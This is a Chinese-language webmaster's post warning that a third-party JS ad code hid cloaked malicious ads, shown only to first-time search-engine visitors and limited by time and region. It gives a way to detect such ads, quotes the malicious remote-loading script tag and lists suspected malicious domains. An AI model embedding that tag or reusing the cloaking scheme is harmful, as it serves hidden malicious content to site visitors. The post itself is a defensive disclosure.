以前不接个人或小联盟js代码的广告,也曾担心过,最近百度不景气,所以接了一些主动联系投放来的广告,却没想到发现有一人的代码里含有隐藏代码,站长极难发现,为什么这么说呢,因为:
- 主动访问(直接输入网址)的人不执行恶意垃圾广告
- 访问过网站的人不执行恶意代码
- 只有来自搜索引擎且是首次访问网站的人才会出现垃圾广告,且只出现一次
- 做了部分时间段的执行,甚至可以做地域的限制
所以作为网站的工作人员,发现的可能性几乎为零。各位接不知名的js代码广告时,多谨慎吧!
检查广告是否含恶意方法:在多地区、多设备(移动广告就用移动设备)、多个时间段,清空浏览器cookie等缓存,从百度搜索链接点击打开含代码网址!尽量要多次测试。
附:
隐含恶意广告代码:<script src=’http://1234.jjxgly.com:8585/?play=1550-js’></script> 联盟登录地址:tg.jj1234.com
实例:
上面图片框中的域名网址大都是作恶者、帮凶或利益相关者:
1234.jjxgly.com:8585
weld.pnaea.com:8112
weldimg.pnaea.com:8112
m.12306media.com
s.xm9178.com
hd.huiyang333.com
im.56zzw.com
hp.17jimei.com
tz.hk9600.com